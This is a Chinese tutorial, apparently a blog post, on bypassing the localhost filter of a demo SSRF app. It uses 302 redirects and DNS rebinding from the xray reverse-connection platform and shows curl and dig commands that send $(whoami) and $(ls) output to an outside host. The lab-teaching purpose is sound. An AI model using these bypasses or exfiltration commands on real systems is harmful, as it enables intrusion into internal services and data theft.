目标是什么(Target)
在 https://github.com/virusdefender/ssrf-app 提供了一个 ssrf 的实例程序,docker-compose build && docker-compose up
之后,浏览器访问 http://vuln.net:8000/?url=http://example.com
,系统就会抓取指定的地址的网页并返回,就可以看到和直接访问 http://example.com
一样的页面。
要注意的是,vuln.net 是我绑定的 host 到 docker 容器的 IP,我使用的 docker for mac,ip 为 127.0.0.1
,这其实是经过端口转发的,后端服务器实际并不在我本地,这里可以看实际情况去修改。

/api/internal/secret
上存放了一个 secret api 服务,目标就是去访问它然后获取 secret,直接访问当然是不行了,会提示 IP 不在允许范围内。
首先的思路就是使用抓取网页的 api 去访问 secret api,所以先尝试将 url
参数换成内网 IP,然后访问查看。
直接访问 127.0.0.1 和使用 localhost 域名
直接访问 127.0.0.1 和使用 localhost 域名
第一个尝试的当然是 

127.0.0.1
,但是访问 http://vuln.net:8000/?url=http://127.0.0.1:8000
却提示 127.0.0.1 is forbidden
,尝试使用 localhost
域名绕过,也是同样的提示,怀疑后端有尝试去解析 ip 然后做验证。

尝试扫内网吧
尝试扫内网吧
如果更换为其他的内网 ip,会提示连接超时
HTTPConnectionPool(host='192.168.1.1', port=8000): Max retries exceeded with url: / (Caused by ConnectTimeoutError(, 'Connection to 192.168.1.1 timed out. (connect timeout=2)'))
,当然这也是探测内网 ip 和端口是否存在的一种特征。
但是经过尝试,常见的 IP 和端口都是超时的,服务器应该是没有内网的(此处应该写一个脚本去扫描更多的 IP 和端口)。所以重点就在于如何绕过对 127.0.0.1
的限制了。看看 IPv6
看看 IPv6
首先是尝试使用 IPv6 去绕过,访问
http://vuln.net:8000/?url=http://[::1]:8000
,如果服务器监听了 IPv6 的地址,就可以绕过,因为访问的确实不是 127.0.0.1
。但是经过测试发现还是报错,[Errno -2] Name or service not known
,可能后端有一些函数是不支持 IPv6 的,像是将 [::1]
按照一个域名去解析了,所以这条路走不通了。30x 跳转也许可以
30x 跳转也许可以
接下来是利用 30x 跳转去绕过,因为看上面的报错信息,后端应该是 Python,Python 的 requests 等库都是默认允许跳转的,如果可以提供一个非
127.0.0.1
的 url,然后访问的时候返回一个 302 跳转到 127.0.0.1
上去就可以了。我们需要一个可以方便的自定义 http response 的平台,一种思路就是配置一个 Nginx,结合配置文件或者 Lua 脚本可以完全的实现各种自定义,但是稍有些麻烦,这时候我们就应该请出 xray 自带的反连平台了,它可以方便的在网页上配置我们期望的东西。使用 xray 自带的反连平台
如何配置
如何配置
首先去 GitHub 下载最新的 xray 二进制文件,然后运行 暂时只需要反连平台的 HTTP 相关功能,而不需要漏洞扫描和反连平台 DNS 相关的功能,所以只关心上面 DNS 以外的配置文件就足够了。为了让之前提到的存在 ssrf 漏洞的应用可以访问的到,我们将 xray 运行在一个公网 IP 的机器上,所以 xray 监听的 IP 等等都需要配置,将上面的配置修改如下。修改完成之后,运行 访问提示的地址 
./xray help
让 xray 生成一个默认的配置文件 config.yaml
。我们需要在这个配置文件中配置反连平台的一些参数,默认是配置如下。./xray reverse
,就可以看到反连平台启动了。http://140.143.224.171:4445/cland/
就可以看到反连平台的的界面了。点击 生成一个 URL
就会提示输入 token。
反连平台的 HTTP 访问记录功能
反连平台的 HTTP 访问记录功能
先按照页面上的提示先测试下反连平台的功能,运行 然后在左边的
而且反连平台支持在 url 后面随意添加参数,比如 
curl -v http://140.143.224.171:4445/p/89acfe/H34v/
HTTP
一栏中就可以看到了访问记录
http://140.143.224.171:4445/p/89acfe/H34v/$(whoami)
,这样在测试一些命令执行漏洞的时候,就很方便的将一些执行结果带出来。如果 url 位置的长度不够,还可以使用 POST 方法。比如 curl -v http://140.143.224.171:4445/p/89acfe/H34v/ -d "$(ls)"
就可以看到访问记录是这样的。
反连平台指定 response 功能
反连平台指定 response 功能
话说回来,为了验证之前利用跳转进行绕过的思路,我们在 xray 的反连平台上创建一个 url,然后指定 status code 和 header 就可以了。在网页上配置起来也是非常的简单。
点击保存之后,我们先用 curl 测试下。工作一切正常。

跳转可以绕过验证,成功~
跳转可以绕过验证,成功~
访问 

http://vuln.net:8000/?url=http://140.143.224.171:4445/p/1cd0a7/3OGA/
发现漏洞利用成功,查看反连平台的访问记录,也验证了之前的猜测,后端是一个 Python 的服务。

有什么其他的绕过么(bypass)
两次解析 IP 一定一样吗
两次解析 IP 一定一样吗
我们这么怀疑有有依据的
- Linux 的
getaddrbyname
等函数只会返回一个 IP,但是实际上一个域名是可以配置多条 IP 的,那这时候,如果返回 IP 的顺序是随机的,就可能被绕过。 - 为了提高性能而且减轻 dns 服务器的负担,域名的解析记录都是有缓存时间的,就是
TTL
,一般为 60s 或者 600s,但是也可以配置为 0,这样每次向 dns 服务器查询,dns 服务器都需要去这个域名的 ns 服务器重新查询。本条思路在实践中主要存在两个问题 - 主流的公开的 ns 服务器都不能配置
TTL
为 0,只能使用自己的解析服务。 - 很多 dns 服务器并不完全遵循
TTL
,比如配置了TTL
为 0 也会强制缓存一小段时间。经过验证,8.8.8.8
提供的 dns 服务器是完全遵循的。
6块钱买一个域名来测试
6块钱买一个域名来测试
为了测试 dns rebinding 漏洞,我们需要去购买一个域名,当然是选择最便宜的了,反正使用没有任何区别,我是在阿里云购买的
然后遇到了拦路虎,ns 服务器必须是域名,而不能是 IP,这时候我们还需要再去买一个域名?
revc.xyz
域名,一年只需要 6 块钱,如果不需要长期持有,第二年重新购买一个就足够了,因为续费是比较贵的。按照上面的思路,我们需要将这个域名的 ns 服务器修改为自己的,这时候我们可以再去借助 xray 自带的反连平台了,因为它也是支持作为 ns 服务器去解析域名的,去阿里云的管理界面修改就可以了。
鸡生蛋还是蛋生鸡的问题
鸡生蛋还是蛋生鸡的问题
其实不是的,我们完全自己解析自己,也就是
我们配置 要注意的是 dns 服务需要监听 UDP 53 端口,需要 root 权限而且记得在防火墙中放行。
ns1.revc.xyz
和 ns2.revc.xyz
作为 revc.xyz
的 ns 服务器。这时候有人可能有疑问,这不是鸡生蛋蛋生鸡的问题么,ns1
和 ns2
去哪里解析,这其实是 dns 提供的功能,添加 glue record,我们可以先不用了解细节,直接去配置即可。就在左侧导航栏的 自定义 DNS Host
里面。
ns1
和 ns2
为服务器的 IP,然后回到上一个页面配置 ns 为 ns1.revc.xyz
和 ns2.revc.xyz
就可以了。然后注意下面的提示,我们还需要添加 ns1
和 ns2
的 A 记录。这些都可以在 xray 的反连平台中配置。编辑刚才的配置文件./xray reverse
启动,这时候可以看到提示信息多了一些,dns server
也启动了。反连平台可以解析 *.revc.xyz 的任意域名了
反连平台可以解析 *.revc.xyz 的任意域名了
回到界面上,点击 可以看出来 ns1 的解析记录是对的,这个是我们配置文件中的静态解析规则。在界面上可以生成一个新域名,如果我们不需要 dns rebinding 的功能,只需要查看解析记录的话,那和之前的 HTTP 访问记录功能没有太大差别,比如
实际解析的域名中间的部分就是执行命令的结果。
生成一个域名
,我们先来验证一下之前的配置有没有生效,因为 ns 记录大概需要几个小时才能全球生效,当然如果指定了 dns 服务器为自己的的话,就不需要了。dig p-9fd889-lzyk.$(whoami).revc.xyz A@140.143.224.171
就可以看到左侧 DNS 一栏中的记录了。
dns rebinding 也可以绕过验证,成功~
dns rebinding 也可以绕过验证,成功~
话说回来,为了验证我们之前利用 dns rebinding 进行绕过的思路,我们在 xray 的反连平台上创建一个 域名,然后指定两次不同的解析 IP 而且 TTL 为 0 就可以了。在网页上配置起来也是非常的简单。
点击保存之后,同样是先本地测试一下。可以看出来第一次和第二次的解析结果是不一样的,将 DNS 服务器更换为 
在 DNS 解析历史记录中,我们看到了两个 Google 的 IP,也就是说明 Python 的后端去解析了两次,因为 TTL=0,dns 服务器每次都要回源重新解析,这样第一次和第二次访问结果不一致也就绕过了检查。

8.8.8.8
可以得到相同的结果。因为 dns rebinding 配置的两次访问是有顺序的,而且我们已经都访问过了,如果再次去解析这个域名,反连平台就只能返回默认的解析结果了,这时候可以通过再次点击保存按钮来重置访问顺序。构造 http://vuln.net:8000/?url=http://p-04f887-2kua.revc.xyz:8000/api/internal/secret
的 url,我们又获取到了 secret。

备注(note)
- 使用
0.0.0.0
代替127.0.0.1
是另外一种绕过思路 - 利用上面的思路访问本地的 22 和 6379 还可以发现 SSH 和 Redis 服务,也是一个重要的信息。